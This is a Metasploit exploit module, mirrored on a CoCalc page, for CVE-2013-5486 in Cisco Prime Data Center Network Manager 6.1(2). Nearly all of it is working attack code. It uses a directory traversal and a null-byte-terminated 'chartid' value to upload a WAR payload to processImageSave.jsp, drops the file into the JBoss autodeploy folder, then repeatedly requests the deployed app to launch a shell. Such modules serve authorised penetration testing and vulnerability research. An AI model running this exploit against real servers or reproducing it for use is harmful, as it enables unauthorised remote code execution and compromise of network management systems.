CoCalc -- cisco_dcnm

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/cisco_dcnm_upload.rb
¹⁹⁸⁴⁹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
17
        'Description' => %q{
18
          This module exploits a code execution flaw in Cisco Data Center Network Manager. The
19
          vulnerability exists in processImageSave.jsp, which can be abused through a directory
20
          traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
21
          application server feature is used to achieve remote code execution. This module has been
22
          tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
23
          (64 bits).
24
        },
25
        'Author' => [
26
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
27
          'juan vazquez' # Metasploit module
28
        ],
29
        'License' => MSF_LICENSE,
30
        'References' => [
31
          [ 'CVE', '2013-5486'],
32
          [ 'OSVDB', '97426' ],
33
          [ 'ZDI', '13-254' ],
34
          [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
35
        ],
36
        'Privileged' => true,
37
        'Platform' => 'java',
38
        'Arch' => ARCH_JAVA,
39
        'Targets' => [
40
          [
41
            'Cisco DCNM 6.1(2) / Java Universal',
42
            {
43
              'AutoDeployPath' => "../../../../../deploy",
44
              'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
45
            }
46
          ]
47
        ],
48
        'DefaultTarget' => 0,
49
        'DisclosureDate' => '2013-09-18',
50
        'Notes' => {
51
          'Reliability' => UNKNOWN_RELIABILITY,
52
          'Stability' => UNKNOWN_STABILITY,
53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
54
        }
55
      )
56
    )
57

58
    register_options(
59
      [
60
        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
61
        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
62
      ]
63
    )
64
  end
65

66
  def upload_file(location, filename, contents)
67
    res = send_request_cgi(
68
      {
69
        'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
70
        'method' => 'POST',
71
        'encode_params' => false,
72
        'vars_post' =>
73
          {
74
            "mode" => "save",
75
            "savefile" => "true",
76
            "chartid" => "#{location}/#{filename}%00",
77
            "data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
78
          }
79
      }
80
    )
81

82
    if res and res.code == 200 and res.body.to_s =~ /success/
83
      return true
84
    else
85
      return false
86
    end
87
  end
88

89
  def check
90
    version = ""
91

92
    res = send_request_cgi({
93
      'url' => target_uri.to_s,
94
      'method' => 'GET'
95
    })
96

97
    unless res
98
      vprint_error("Connection timed out")
99
      return Exploit::CheckCode::Unknown
100
    end
101

102
    if res.code == 200 and
103
       res.body.to_s =~ /Data Center Network Manager/ and
104
       res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
105
      version = $1
106
      vprint_status("Cisco Primer Data Center Network Manager version #{version} found")
107
      if version =~ /6\.1/
108
        return Exploit::CheckCode::Appears
109
      else
110
        return Exploit::CheckCode::Detected
111
      end
112

113
    elsif res.code == 200 and res.body.to_s =~ /Data Center Network Manager/
114
      return Exploit::CheckCode::Detected
115
    end
116

117
    Exploit::CheckCode::Safe
118
  end
119

120
  def exploit
121
    attempts = datastore['ATTEMPTS']
122
    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
123

124
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
125

126
    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
127
    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
128
    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
129
    war = payload.encoded_war({ :app_name => app_base }).to_s
130
    war_filename = "#{app_base}.war"
131
    war_location = target['AutoDeployPath']
132

133
    print_status("Uploading WAR file #{war_filename}...")
134
    res = upload_file(war_location, war_filename, war)
135

136
    if res
137
      register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
138
    else
139
      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
140
    end
141

142
    attempts.times do
143
      select(nil, nil, nil, 2)
144

145
      # Now make a request to trigger the newly deployed war
146
      print_status("Attempting to launch payload in deployed WAR...")
147
      res = send_request_cgi(
148
        {
149
          'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8) + 8)),
150
          'method' => 'GET'
151
        }
152
      )
153
      # Failure. The request timed out or the server went away.
154
      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
155
      # Success! Triggered the payload, should have a shell incoming
156
      break if res.code == 200
157
    end
158
  end
159
end
160

161
Product

Resources

Company
